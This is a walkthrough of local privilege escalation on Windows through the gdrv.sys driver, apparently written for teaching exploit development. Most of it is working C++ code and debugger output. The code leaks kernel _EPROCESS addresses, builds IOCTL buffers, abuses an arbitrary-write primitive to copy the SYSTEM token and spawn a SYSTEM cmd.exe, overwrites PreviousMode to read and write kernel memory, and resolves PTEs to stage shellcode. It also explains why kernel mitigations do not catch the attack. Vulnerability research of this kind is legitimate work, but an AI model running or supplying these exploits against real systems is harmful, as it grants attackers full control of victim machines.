Now, with the helper functions implemented, we’ll attempt to exploit the following 3 IOCTL handlers, in an attempt to receive a privileged NT AUTHORITY\SYSTEM shell:

MmMapIoSpace_vulnerable()
ArbitraryWrite_vulnerable()
IOCTL 0xC3502840 (line 170 from the start of the reversed DeviceControlDispatchRoutine() function).

We’ll start with planning the attack vector on MmMapIoSpace_vulnerable(). Let’s review the function once again:

The function maps physical memory into virtual kernel space, with a specified number of bytes, using MmMapIoSpace(). Next, memmove() is called, copying the mapped space to the destination address supplied in the SystemBuffer.

In this function, we control the following elements:

The physical memory that will be mapped into virtual kernel space and the number of bytes to map from physical memory to virtual memory in the kernel.
The destination argument in the memmove() where the virtually mapped data will be copied to.

We can attempt to leverage these elements to our advantage in the following way: we have the ability to leak the _EPROCESS object address of the SYSTEM process (using the NtQuerySystemInformation() function) and get the address of the Token field in that _EPROCESS. Then, we can use the “MmGetPhysicalAddress_vulnerable()” IOCTL handler to translate the Token virtual address into a “physical address”.

Next, we can leverage “NtQuerySystemInformation()” to obtain the _EPROCESS object address of our current process, and retrieve the virtual address of our Token field.

Having the “Physical Address” of the Token field in the _EPROCESS object of the SYSTEM process, and the virtual address of our own Token field, it’s possible to craft an “Input Buffer” that maps the Token field of the SYSTEM process and uses memmove() to copy it over our own process’ Token field. This will allow our current process to run with the privilege level of the SYSTEM process.
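The address arithmetic behind this plan is small enough to sketch. The 0x4B8 Token offset is the one this article’s main() uses and is specific to the Windows build; the helper names are hypothetical. The mask reflects that on x64 the Token field is an _EX_FAST_REF whose low 4 bits hold a reference count rather than address bits, which is worth keeping in mind when comparing a copied value with the token object address shown in a debugger.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kTokenOffset = 0x4B8;  // _EPROCESS.Token offset used in this article; build-specific
constexpr uint64_t kFastRefMask = 0xF;    // low 4 bits of an x64 _EX_FAST_REF are a reference count

// Virtual address of the Token field inside a given _EPROCESS object.
uint64_t TokenFieldAddress(uint64_t eprocessAddress)
{
    return eprocessAddress + kTokenOffset;
}

// Strips the reference count bits to get the token object pointer.
uint64_t TokenObjectFromFastRef(uint64_t fastRefValue)
{
    return fastRefValue & ~kFastRefMask;
}
```

For a made-up _EPROCESS at 0xFFFF9A88A1234080, the Token field would sit at 0xFFFF9A88A1234538.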

Let’s start by implementing a helper function that uses NtQuerySystemInformation():

  
PVOID LeakProcessAddress(DWORD TargetPID)
{
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, TargetPID);

    PSYSTEM_HANDLE_INFORMATION SystemInformation = NULL;
    NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH;
    ULONG SystemHandleInformationSize = 0x100000;

    PVOID ObjectAddress = NULL;
    DWORD PID = 0;

    do {
        if (SystemInformation)
            free(SystemInformation);

        SystemInformation = (PSYSTEM_HANDLE_INFORMATION)calloc(1, SystemHandleInformationSize);
        if (!SystemInformation) {
            printf("Memory allocation failed!\n");
            if (hProcess)
                CloseHandle(hProcess); // Don't leak the process handle on failure
            return NULL;
        }

        status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation,
            SystemInformation, SystemHandleInformationSize, &SystemHandleInformationSize);

    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    if (!NT_SUCCESS(status)) {
        printf("NtQuerySystemInformation failed with status: 0x%x\n", status);
        free(SystemInformation);
        if (hProcess)
            CloseHandle(hProcess); // Don't leak the process handle on failure
        return NULL;
    }

    for (ULONG i = 0; i < SystemInformation->NumberOfHandles; i++)
    {
        PID = SystemInformation->Handles[i].UniqueProcessId;
        if (PID != TargetPID)
            continue;

        // 7 is the object type index of Process objects on the tested build;
        // it may differ between Windows versions
        if (SystemInformation->Handles[i].ObjectTypeIndex == 7)
        {
            ObjectAddress = SystemInformation->Handles[i].Object;
            printf("[*] PID: %lu | _EPROCESS Object Address: 0x%p\n", PID, ObjectAddress);
            break;
        }
    }
    if (!ObjectAddress)
        printf("[-] Object Address not found: GetLastError(): %u\n", GetLastError());

    CloseHandle(hProcess);
    free(SystemInformation);

    return ObjectAddress;
}

The function receives a PID as its argument and passes it to the OpenProcess() API function to open a handle to the target process. Next, NtQuerySystemInformation() is called, and the handle information it returns is iterated in a loop to find a process handle owned by the target PID, from which we can extract the _EPROCESS address. Once the _EPROCESS address of the target process is found, it’s returned to the caller.

Let’s implement the main() function that uses the helper function to get our current process’ token field virtual address and the SYSTEM process token physical address:

  
int main() {
    printf("[+] Starting execution...\n");

    ULONG_PTR SystemProcessAddress = (ULONG_PTR)LeakProcessAddress((DWORD)4);
    ULONG_PTR SystemTokenPhysicalAddress = GetPhysicalAddress((ULONG_PTR)SystemProcessAddress + 0x4B8);
    SystemTokenPhysicalAddress = SystemTokenPhysicalAddress | 0x0000000100000000;
    printf("[+] System Process Virtual Address: 0x%llx\n", SystemProcessAddress);
    printf("[+] System Process token Physical Address: 0x%llx\n", SystemTokenPhysicalAddress);

    ULONG_PTR LocalProcessAddress = (ULONG_PTR)LeakProcessAddress(GetCurrentProcessId());
    printf("[+] Local Process base Virtual Address: 0x%llx\n", LocalProcessAddress);

    ULONG_PTR LocalProcessTokenVirtualAddress = (ULONG_PTR)(LocalProcessAddress + 0x4B8);
    printf("[+] Local Process token's Virtual Address: 0x%llx\n", LocalProcessTokenVirtualAddress);

    getchar(); // Halt execution...
    return 0;
}

The “SystemTokenPhysicalAddress” is OR’d with 0x0000000100000000 because the IOCTL that translates a virtual address to a physical address returns only the low 4 bytes of the result, so the 5th byte of a physical address above 4 GB is lost. On this test machine that byte is 1, so we restore it manually; on a machine where the physical address falls in a different range, this constant has to be adjusted. Let’s validate that we get proper addresses by running the program on the testing machine:

In this scenario:

System Process Virtual Address: 0xFFFFC90FDEA61040
System Process token Physical Address: 0x00000001DCA614F8
Local Process base Virtual Address: 0xFFFFC90FE65DD0C0
Local Process token’s Virtual Address: 0xFFFFC90FE65DD578
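
The numbers above can be cross-checked offline. The following is a minimal user-mode sketch that never talks to the driver: `TokenFieldAddress`, `Truncate32`, `RestoreHighBits` and `SamePageOffset` are hypothetical helper names, 0x4B8 is the Token offset used throughout this article, and the upper half passed to `RestoreHighBits` is an assumption that has to be confirmed per machine, since a hard-coded 1 is only right when the real physical address lies between 4 GB and 8 GB.

```cpp
#include <cassert>
#include <cstdint>

// _EPROCESS.Token offset on the build used in this article; it differs between versions.
constexpr std::uint64_t kTokenOffset = 0x4B8;

// Virtual address of the Token field inside a given _EPROCESS.
constexpr std::uint64_t TokenFieldAddress(std::uint64_t eprocess) {
    return eprocess + kTokenOffset;
}

// Models the translation IOCTL's output: only the low 32 bits come back.
constexpr std::uint32_t Truncate32(std::uint64_t physical) {
    return static_cast<std::uint32_t>(physical);
}

// Re-attaches the lost upper half. `high` is an assumption the caller must
// confirm (for example in WinDbg); it is 1 on the test machine shown here.
constexpr std::uint64_t RestoreHighBits(std::uint32_t low, std::uint32_t high) {
    return (static_cast<std::uint64_t>(high) << 32) | low;
}

// A virtual address and its physical translation share the low 12 bits.
constexpr bool SamePageOffset(std::uint64_t va, std::uint64_t pa) {
    return (va & 0xFFF) == (pa & 0xFFF);
}

// Replays the values printed by the program above.
inline void CheckArticleValues() {
    const std::uint64_t systemToken = TokenFieldAddress(0xFFFFC90FDEA61040ull);
    assert(systemToken == 0xFFFFC90FDEA614F8ull);
    assert(TokenFieldAddress(0xFFFFC90FE65DD0C0ull) == 0xFFFFC90FE65DD578ull);

    const std::uint32_t low = Truncate32(0x00000001DCA614F8ull);
    assert(low == 0xDCA614F8u);
    assert(RestoreHighBits(low, 1) == 0x00000001DCA614F8ull);
    assert(SamePageOffset(systemToken, RestoreHighBits(low, 1)));
}
```

The page-offset comparison is a cheap sanity check: if the low 12 bits of the translated address don’t match those of the virtual address, the translation can’t be right, whatever the upper bits are.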

Let’s verify it in WinDbg:

  
!process 0xffffc90fdea61040 0

Comparing the contents at the virtual address and at the physical address of the Token field in the SYSTEM process, we can see that they match:

  
dq 0xffffc90fdea61040+0x4b8 L1

!dq 0x00000001dca614f8 L1

Verifying the addresses of our local process against the addresses we received, we can see that they match:

  
!process 0xffffc90fe65dd0c0 0

dq 0xffffc90fe65dd0c0+0x4b8 L1

dt nt!_EPROCESS 0xffffc90fe65dd0c0 Token.

Now, let’s implement the “Exploit()” function which will attempt to implement the token stealing attack vector I described earlier:

  
VOID Exploit(ULONG_PTR CurrentProcessObjectAddress,
             ULONG_PTR SystemTokenPhysicalAddress,
             ULONG_PTR CurrentProcessTokenAddress)
{
    printf("[+] In Exploit()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    printf("[*] Exploit Handle value: 0x%p\n", hDevice);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return;
    }

    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");


    //PVOID CurrentProcessObjectAddress = LeakProcessAddress(GetCurrentProcessId());
    //PVOID SystemProcessObjectAddress = LeakProcessAddress((DWORD)4); // SYSTEM's PID = 4

    //printf("[*] SYSTEM Process Base Address: 0x%p\n", SystemProcessObjectAddress);
    //printf("[*] Current Process Base Address: 0x%p\n", CurrentProcessObjectAddress);


    //ULONG_PTR SystemTokenAddress = (ULONG_PTR)SystemProcessObjectAddress + 0x4b8;
    //ULONG_PTR  CurrentProcessTokenAddress = (ULONG_PTR)CurrentProcessObjectAddress + 0x4b8;

    //printf("[*] SYSTEM Token Virtual Address: 0x%p\n", SystemTokenAddress);
    //printf("[*] Local Process Token Virtual Address: 0x%p\n", CurrentProcessTokenAddress);


    ULONG_PTR* InputBuffer = (ULONG_PTR*)calloc(1, 0x40);      // 0x40-byte request that becomes the SystemBuffer
    ULONG_PTR* OutputBuffer = (ULONG_PTR*)calloc(1, 0x40);
    printf("[*] User-Mode Virtual Address of InputBuffer: 0x%p\n", InputBuffer);

    DWORD AddressSize = 8;

    // The 5th byte is truncated by the GetPhysicalAddress() IOCTL because
    // Irp->IoStatus.Information = 4 bytes
    printf("[*] SYSTEM Token Physical Address: 0x%p\n", SystemTokenPhysicalAddress);

    RtlCopyMemory((BYTE*)InputBuffer + 8, &SystemTokenPhysicalAddress, 8);
    RtlCopyMemory((BYTE*)InputBuffer + 20, &AddressSize, 4);
    RtlCopyMemory((BYTE*)InputBuffer + 24, &CurrentProcessTokenAddress, 8);

    printf("InputBuffer[0]: %p\n", InputBuffer[0]);
    printf("InputBuffer[1]: %p\n", InputBuffer[1]);
    printf("InputBuffer[2]: %p\n", InputBuffer[2]);
    printf("InputBuffer[3]: %p\n", InputBuffer[3]);
    printf("InputBuffer[4]: %p\n", InputBuffer[4]);

    //DebugBreak();

    printf("[*] Debug: getting into DeviceIoControl() request\n");
    DWORD BytesReturned = 0;
    //DebugBreak();
    if (DeviceIoControl(hDevice, IOCTL_MmMapIoSpace, InputBuffer, 0x40, OutputBuffer, 0x40, &BytesReturned, nullptr))
        printf("[+] Exploit() DeviceIoControl (0x%x) executed successfully!\n", IOCTL_MmMapIoSpace);
    DebugBreak();

    CloseHandle(hDevice);
    free(InputBuffer);
    free(OutputBuffer);
}

Let’s go over the function.

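The “Exploit()” function takes 3 arguments, of which the first isn’t used in the function body:

CurrentProcessObjectAddress (Virtual Address, unused)
SystemTokenPhysicalAddress (Physical Address)
CurrentProcessTokenAddress (Virtual Address)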

The function starts by opening a handle to the \\.\GIO device object, which is managed by the gdrv.sys driver we’re exploiting. Next, both the “input buffer” and the “output buffer” are allocated.

The “InputBuffer”, which in kernel mode will be the SystemBuffer, is constructed in the following way:

SystemBuffer[8–16] - holds the SYSTEM process token physical address.
SystemBuffer[20–24] - holds the number of bytes that will be mapped into the kernel’s virtual memory.
SystemBuffer[24–32] - holds the virtual address of the current process’ token, which is also the destination in the memmove() function.

Next, DeviceIoControl() is called, sending an IRP that reaches the IOCTL handler.
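
To make the byte offsets above easier to audit, the same layout can be written as a packed structure. This is only a sketch: `MapIoSpaceRequest` and `BuildMapIoSpaceRequest` are hypothetical names, the unused regions are simply the bytes the exploit leaves zeroed, and nothing here is taken from the driver’s own headers.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical view of the 0x40-byte request; only three fields matter here.
#pragma pack(push, 1)
struct MapIoSpaceRequest {
    std::uint8_t  unused0[8];       // +0x00: left zeroed by the exploit
    std::uint64_t physicalAddress;  // +0x08: physical address to map
    std::uint8_t  unused1[4];       // +0x10: left zeroed by the exploit
    std::uint32_t numberOfBytes;    // +0x14: number of bytes to map
    std::uint64_t destination;      // +0x18: memmove() destination
    std::uint8_t  padding[0x20];    // +0x20: pads the request to 0x40 bytes
};
#pragma pack(pop)

static_assert(offsetof(MapIoSpaceRequest, physicalAddress) == 8, "SystemBuffer[8-16]");
static_assert(offsetof(MapIoSpaceRequest, numberOfBytes) == 20, "SystemBuffer[20-24]");
static_assert(offsetof(MapIoSpaceRequest, destination) == 24, "SystemBuffer[24-32]");
static_assert(sizeof(MapIoSpaceRequest) == 0x40, "same size as calloc(1, 0x40)");

// Fills a zero-initialized request the same way the RtlCopyMemory() calls do.
inline MapIoSpaceRequest BuildMapIoSpaceRequest(std::uint64_t physicalAddress,
                                                std::uint32_t numberOfBytes,
                                                std::uint64_t destination) {
    assert(numberOfBytes != 0);   // mapping zero bytes would be pointless
    MapIoSpaceRequest request{};  // all bytes zero, like calloc()
    request.physicalAddress = physicalAddress;
    request.numberOfBytes = numberOfBytes;
    request.destination = destination;
    return request;
}
```

With a structure like this, the compiler verifies the offsets through `static_assert` instead of relying on hand-written `+ 8`, `+ 20` and `+ 24` arithmetic.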

Let’s view the execution in WinDbg. First, we’ll set a breakpoint on the base address of MmMapIoSpace_vulnerable() function:

  
bp gdrv+0x1570

Next, we’ll continue execution and run the “gdrv_exploit.exe” client code until we reach the breakpoint:

Now that we hit the breakpoint, let’s view the SystemBuffer field in the IRP and verify that it was crafted correctly:

  
dt nt!_IRP @rdx AssociatedIrp.

In the buffer we can see the physical address we passed, the NumberOfBytes field (which is 8), and the virtual address of our local process’ Token field.

Now, let’s continue execution by executing the “g” command and see what happens:

Unfortunately, we get a system crash. Executing !analyze -v to get more information about the crash:

We can see that Arg1 holds a truncated DWORD of our process’ token virtual address. Let’s take a second look at the memmove() function call:

We can see that the destination argument is treated as a pointer to a 4-byte integer: the value is dereferenced and truncated to 32 bits instead of being used as a full 8-byte pointer. The copy therefore never targets our Token field, which makes this path not exploitable.
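
The effect of that truncation is easy to reproduce in user mode. The sketch below only models the loss of the upper 32 bits; `LowDword` and `SurvivesTruncation` are hypothetical names, and how the driver extends the value afterwards is not assumed here.

```cpp
#include <cassert>
#include <cstdint>

// Models reading an 8-byte pointer through a 4-byte integer type.
constexpr std::uint32_t LowDword(std::uint64_t pointer) {
    return static_cast<std::uint32_t>(pointer);  // upper 32 bits are dropped
}

// True only when no information is lost, i.e. the upper 32 bits were already zero.
constexpr bool SurvivesTruncation(std::uint64_t pointer) {
    return static_cast<std::uint64_t>(LowDword(pointer)) == pointer;
}

inline void CheckTruncation() {
    // Local process Token field address from the earlier run.
    const std::uint64_t tokenField = 0xFFFFC90FE65DD578ull;
    assert(LowDword(tokenField) == 0xE65DD578u);
    assert(!SurvivesTruncation(tokenField));   // every kernel address loses bits
    assert(SurvivesTruncation(0x7FFE0000ull)); // a low address would pass through intact
}
```

Since every kernel-mode virtual address on x64 has non-zero upper bits, no kernel destination can pass through this code path unchanged.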

Exploit Development - Attempt 2 - Arbitrary Write (Token Stealing)

Let’s now move on to a reversed function called ArbitraryWrite_vulnerable():

We’ve already reversed it, but as a reminder the function parses the SystemBuffer into 3 parts:

Destination address
Source address
Number of bytes to copy

This function can be leveraged as an “Arbitrary Write” primitive, which opens up many possibilities for escalating our privileges and more.

Let’s view an implementation of a function that interacts with IOCTL and invokes the “Arbitrary Write” primitive:

  
VOID ArbitraryWrite(ULONG_PTR SrcAddress, ULONG_PTR DstAddress, ULONG_PTR Size)
{
    printf("[*] In ArbitraryWrite()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return;
    }

    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");

    printf("[*] SrcAddress: 0x%p\n", SrcAddress);
    printf("[*] DstAddress: 0x%p\n", DstAddress);
    printf("[*] Size: 0x%p\n", Size);

    ULONG_PTR* InputBuffer = (ULONG_PTR*)calloc(1, 24);

    RtlCopyMemory((BYTE*)InputBuffer, &DstAddress, 8);
    RtlCopyMemory((BYTE*)InputBuffer + 8, &SrcAddress, 8);
    RtlCopyMemory((BYTE*)InputBuffer + 16, &Size, 4);

    printf("[*] InputBuffer[0]: %p\n", InputBuffer[0]);
    printf("[*] InputBuffer[1]: %p\n", InputBuffer[1]);
    printf("[*] InputBuffer[2]: %p\n", InputBuffer[2]);

    DWORD BytesReturned = 0;
    if (DeviceIoControl(hDevice, IOCTL_ArbitraryWrite, InputBuffer, 24, nullptr, 0, &BytesReturned, nullptr))
        printf("[+] DeviceIoControl() on 0x%x executed successfully!\n", IOCTL_ArbitraryWrite);
    else
        printf("[-] DeviceIoControl() on 0x%x failed with GetLastError(): %u\n", IOCTL_ArbitraryWrite, GetLastError());

    free(InputBuffer);
    CloseHandle(hDevice);
}

The function takes 3 arguments:

Source Address
Destination Address
Number of bytes to copy

The function starts by opening a handle to the \\.\GIO device object, and allocates an InputBuffer that will serve as the SystemBuffer during kernel-mode execution. It’s structured in the following way:

SystemBuffer[0–8] holds the “Destination Address” (QWORD)
SystemBuffer[8–16] holds the “Source Address” (QWORD)
SystemBuffer[16–20] holds the number of bytes to copy (DWORD)

Then, DeviceIoControl() is invoked, which sends the IOCTL that triggers the “ArbitraryWrite” primitive in the driver.

With a potential “Arbitrary Write” primitive at hand, let’s think of the following attack vector: since we can leak the virtual address of the SYSTEM process’ token field and the virtual address of our local process’ token field, we can set the “DestinationAddress” argument to the local process token address, and the “SourceAddress” to the SYSTEM process token field address. When the primitive is invoked, the token of the SYSTEM process will be copied into our own local process token field and will grant us execution as NT AUTHORITY\SYSTEM.
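
The request for this attack can be sketched as a small structure plus a builder. `ArbitraryWriteRequest` and `MakeTokenCopyRequest` are hypothetical names and the 0x4B8 Token offset is the one used in this article; the point of the sketch is that the buffer stores the destination first, while the ArbitraryWrite() wrapper takes the source first, which is an easy place to swap the two by mistake.

```cpp
#include <cassert>
#include <cstdint>

// _EPROCESS.Token offset on the build used in this article.
constexpr std::uint64_t kTokenOffset = 0x4B8;

// Hypothetical view of the 24-byte input buffer.
struct ArbitraryWriteRequest {
    std::uint64_t destination;  // +0x00: where the driver writes
    std::uint64_t source;       // +0x08: where the driver reads from
    std::uint32_t size;         // +0x10: number of bytes to copy
    std::uint32_t unused;       // +0x14: pads the request to 24 bytes
};
static_assert(sizeof(ArbitraryWriteRequest) == 24, "same size as calloc(1, 24)");

// Builds the request that copies the SYSTEM token over the local token.
inline ArbitraryWriteRequest MakeTokenCopyRequest(std::uint64_t systemEprocess,
                                                  std::uint64_t localEprocess) {
    assert(systemEprocess != localEprocess);  // copying a token onto itself does nothing
    ArbitraryWriteRequest request{};
    request.destination = localEprocess + kTokenOffset;  // our Token field
    request.source = systemEprocess + kTokenOffset;      // SYSTEM's Token field
    request.size = 8;                                    // one pointer-sized field
    return request;
}
```

Keeping the source/destination decision in one named function means the rest of the exploit only passes the two _EPROCESS addresses around.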

Let’s modify the main() function and trigger the function:

  
int main()
{
    printf("[*] Starting execution...\n");

    PVOID CurrentProcessObjectAddress = LeakProcessAddress(GetCurrentProcessId());
    PVOID SystemProcessObjectAddress = LeakProcessAddress((DWORD)4); // SYSTEM's PID = 4

    printf("[*] Current Process _EPROCESS (Virtual) Address: 0x%p\n", CurrentProcessObjectAddress);
    printf("[*] SYSTEM Process _EPROCESS (Virtual) Address: 0x%p\n", SystemProcessObjectAddress);

    ULONG_PTR SystemTokenAddress = (ULONG_PTR)SystemProcessObjectAddress + 0x4b8;
    ULONG_PTR CurrentProcessTokenAddress = (ULONG_PTR)CurrentProcessObjectAddress + 0x4b8;
    ULONG_PTR Size = 8;
    printf("[*] SYSTEM Token Address: 0x%p\n", SystemTokenAddress);
    printf("[*] Local Process Token Address: 0x%p\n", CurrentProcessTokenAddress);

    ArbitraryWrite(SystemTokenAddress, CurrentProcessTokenAddress, Size);
    printf("[+] Successfully overwritten Local Process Token with SYSTEM process Token!!\n");
    printf("[+] Press Enter to get SYSTEM shell...\n");
    getchar();
    system("cmd.exe");

    return 0;
}

The main() function now triggers “ArbitraryWrite()” and executes system("cmd.exe") to obtain a privileged shell.

Let’s execute the modified code and see if the SYSTEM token is copied into our local process token and we obtain a privileged shell:

Viewing both SYSTEM process’ token and local process token:

  
dq ffff9d8d2dedd080+4b8 L1

dq ffff9d8d26498040+4b8 L1

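We can see that the tokens are the same (above is the SYSTEM token address location, and at the bottom is the local process token location). If the last hex digit differs, it doesn’t matter: the Token field is an _EX_FAST_REF, whose low 4 bits on x64 hold a cached reference count rather than part of the pointer, so both values refer to the same token.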
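
Because the Token field is an _EX_FAST_REF, two raw values should be compared only after masking out the low 4 bits, which on x64 carry a reference count. A minimal sketch of that comparison follows; the helper names are hypothetical and the sample values in the check are made up for illustration, not taken from the debugging session.

```cpp
#include <cassert>
#include <cstdint>

// On x64, the low 4 bits of an _EX_FAST_REF are a reference count.
constexpr std::uint64_t kFastRefMask = 0xF;

// Pointer part of a raw Token field value.
constexpr std::uint64_t TokenObject(std::uint64_t fastRef) {
    return fastRef & ~kFastRefMask;
}

// Reference-count part of a raw Token field value.
constexpr unsigned CachedRefCount(std::uint64_t fastRef) {
    return static_cast<unsigned>(fastRef & kFastRefMask);
}

// Two Token fields reference the same token when their pointer parts match.
constexpr bool SameToken(std::uint64_t a, std::uint64_t b) {
    return TokenObject(a) == TokenObject(b);
}

inline void CheckFastRefComparison() {
    // Illustrative values only: same object, different cached counts.
    const std::uint64_t systemField = 0xFFFF8A0B12345067ull;
    const std::uint64_t localField  = 0xFFFF8A0B1234506Bull;
    assert(systemField != localField);
    assert(SameToken(systemField, localField));
    assert(CachedRefCount(systemField) == 7u);
    assert(CachedRefCount(localField) == 0xBu);
}
```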

Let’s now continue execution and see if we get a privileged shell:

We successfully got a shell as NT AUTHORITY\SYSTEM.

This is a very basic and evasive way to exploit “Arbitrary Write” without invoking any modern kernel protection mechanisms:

KCFG (Kernel Control Flow Guard) won’t be invoked since we don’t attempt to perform any indirect function call.
SMEP & SMAP (Supervisor Mode Execution Prevention / Supervisor Mode Access Prevention) won’t be invoked here because we don’t perform any direct cross-ring activity (no attempt to execute or access pages from across rings).
Intel CET (Intel Control-flow Enforcement Technology) won’t be invoked either, since we don’t overwrite any return address that CET’s shadow stack would catch.
SLAT/EPT (Second Level Address Translation / Extended Page Tables) won’t be invoked either, since we don’t attempt to execute any page whose execute permission would be checked by the second-level address translation in hypervisor space.

Exploit Development - Attempt 3 - Shellcode Execution

The next thing I want to show is a longer and more educational way that will be detected by KCFG and EPT but can potentially be bypassed.

What we’re going to do is write a “Token Stealing” shellcode into a code cave that resides at KUSER_SHARED_DATA+0x800, modify the PTE of this location to make the page executable, and then trigger the shellcode.

To make our “Arbitrary Write” more convenient, and to also turn it into an “Arbitrary Read” primitive, which we’ll need soon, we’re going to overwrite a field called PreviousMode in our _ETHREAD object structure:

  
CHAR PreviousMode //0x232

This byte-sized field resides at offset 0x232 from the _ETHREAD base address. The kernel consults it in the memory read/write syscalls (NtReadVirtualMemory()/NtWriteVirtualMemory()), and it has only 2 values: 1 if the previous mode of the thread was user mode, which means that the request comes from user mode, or 0, which means that the request comes from kernel mode and is treated as a privileged request.

Let’s view the implementation of NtReadVirtualMemory() in IDA:

We can see that there is a call to MiReadWriteVirtualMemory(), which is an internal Memory Manager function that is being used both in NtReadVirtualMemory() and NtWriteVirtualMemory().

Since the pseudocode view isn’t clear in IDA, we’ll reverse the assembly of the MiReadWriteVirtualMemory() function:

The r14 register is loaded with the value stored at gs:188h (which is _KPCR+0x188). This value is a pointer to the current thread’s _KTHREAD structure, where PreviousMode resides (the _KTHREAD is the first structure in the _ETHREAD object structure).

Next, the instruction movzx eax, byte ptr [r14+232h] takes the byte-sized PreviousMode field and saves it into the “eax” register.

Then, a test al, al instruction is executed, which performs a logical AND of the PreviousMode value with itself to check whether it’s 1 or 0. If the value is 0, the request is treated as a kernel-mode request and skips many of the address sanitization checks performed by the kernel when executing NtReadVirtualMemory() or NtWriteVirtualMemory() operations.

Overwriting PreviousMode will allow us to execute NtReadVirtualMemory() and NtWriteVirtualMemory() on kernel addresses from our user-mode client program.

Since our ArbitraryWrite() writes data from a kernel mode address to another kernel mode address, we’ll need to find a location that will always be 0 in memory, set the address of this location into the “SourceAddress” field, and set our current thread’s PreviousMode address as our “DestinationAddress” field.

The “SourceAddress” we’re going to be using is the base address for where our shellcode will reside, which is currently zeroed out.
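
The idea of “copy one zero byte over PreviousMode” can be rehearsed in user mode before touching the kernel. In this sketch a plain byte array stands in for the thread object and `std::memcpy` stands in for the driver’s copy; `SimulatedArbitraryWrite` and `ZeroPreviousMode` are hypothetical names, and 0x232 is the offset used in this article.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr std::size_t kPreviousModeOffset = 0x232;  // offset used in this article
constexpr std::uint8_t kKernelMode = 0;
constexpr std::uint8_t kUserMode = 1;

// Stand-in for the driver primitive: copies `size` bytes from source to destination.
inline void SimulatedArbitraryWrite(const void* source, void* destination, std::size_t size) {
    std::memcpy(destination, source, size);
}

// Flips PreviousMode in a fake thread object by copying a single zero byte over it.
inline void ZeroPreviousMode(std::uint8_t* fakeThread, const std::uint8_t* zeroedSource) {
    assert(*zeroedSource == 0);  // the source location must really contain 0
    SimulatedArbitraryWrite(zeroedSource, fakeThread + kPreviousModeOffset, 1);
}
```

A size of exactly 1 matters here: a larger copy would also overwrite the fields that follow PreviousMode in the thread object.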

Let’s view an implementation of overwriting PreviousMode on our current thread:

  
int main()
{
    printf("[*] Starting execution...\n");
    NTSTATUS status = 0;
    
    PVOID CurrentProcessObjectAddress = LeakProcessAddress(GetCurrentProcessId());
    PVOID SystemProcessObjectAddress = LeakProcessAddress((DWORD)4); // SYSTEM's PID = 4
    ULONG_PTR shellcode_address = 0xfffff78000000800;

    PVOID CurrentThreadObjectAddress = LeakKthreadAddress(GetCurrentProcessId(), GetCurrentThreadId());
    printf("[*] Current _ETHREAD object address: 0x%p\n", CurrentThreadObjectAddress);

    printf("[*] Press enter to overwrite PreviousMode...\n");
    getchar();
    printf("[*] Overwriting PreviousMode on current thread...\n");
    ArbitraryWrite(shellcode_address, (ULONG_PTR)((ULONG_PTR)CurrentThreadObjectAddress + 0x232), (ULONG_PTR)1);
    printf("[+] PreviousMode was successfully overwritten!...\n");

The LeakKthreadAddress() helper function is very similar to the LeakProcessAddress() helper function and looks like this:

This function takes 2 arguments:

PID
TID

and returns the _KTHREAD address of the target thread.

Let’s now review the ArbitraryWrite() we wrote previously:

Source Address is set to the empty code cave that will soon be filled with our shellcode; it resides at “KUSER_SHARED_DATA+0x800”, which is the fixed address 0xfffff78000000800.
Destination Address is the address of our PreviousMode field.
Size is 1 byte, since PreviousMode is 1 byte.

Let’s now give it a try and execute it:

We can see that our _ETHREAD object address is at 0xFFFF9601CD281080

Before overwriting “PreviousMode”:

  
db 0xFFFF9601CD281080+0x232 L1

We can see that the PreviousMode is set to 1 before execution. Let’s continue execution and see if it was overwritten:

We successfully overwrote PreviousMode for our current executing thread:

  
db 0xFFFF9601CD281080+0x232 L1

Now we can execute NtReadVirtualMemory() and NtWriteVirtualMemory() from user mode against kernel-space addresses.

The next thing we’re going to do before writing the shellcode is setting the appropriate permissions of the PTE (Page Table Entry) of the page where the shellcode is going to reside.

For that, we’re going to implement the following helper function called ReadPTE():

  
PVOID ReadPTE(HANDLE hProcess, ULONG_PTR Address)
{
    // (BaseAddress + 0x2DDF70 + 0x13) == nt!MiGetPteAddress+0x13, which holds the PTE base address
    // NOTE: The offset above is different between OS builds

    ULONG_PTR PteBase = 0;
    ULONG_PTR Base = LeakNtoskrnlBaseAddress();
    ULONG_PTR pPteBase = Base + 0x2DDF70 + 0x13;

    NTSTATUS status = NtReadVirtualMemory(hProcess, (PVOID)pPteBase, (PVOID)&PteBase, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error in reading nt!MiGetPteAddress+0x13 -> NTSTATUS: 0x%x\n", status);
        return nullptr; // Without the PTE base, the computed address would be meaningless
    }

    printf("[+] `PTE` Base (nt!MiGetPteAddress+0x13): 0x%p\n", PteBase);

    // We need to modify the `PTE` of KUSER_SHARED_DATA+0x800 to make the page executable,
    // so we implement nt!MiGetPteAddress using the `PTE` base read from nt!MiGetPteAddress+0x13

    // Implementing nt!MiGetPteAddress:
    ULONG_PTR PTEAddress = Address >> 9;
    PTEAddress &= 0x7FFFFFFFF8;
    PTEAddress += PteBase;

    return (PVOID)PTEAddress;
}

The function takes 2 arguments:

HANDLE hProcess - A handle to the SYSTEM kernel process (PID: 4)
ULONG_PTR Address - The address whose Page Table Entry address should be resolved.

The function is a C implementation of the nt!MiGetPteAddress from the kernel:

The ReadPTE() function starts by reading the PTE base that resides at nt!MiGetPteAddress+0x13; the address of that location is stored in “pPteBase”. The read from kernel memory is performed using NtReadVirtualMemory(), which saves the result into the PteBase variable.

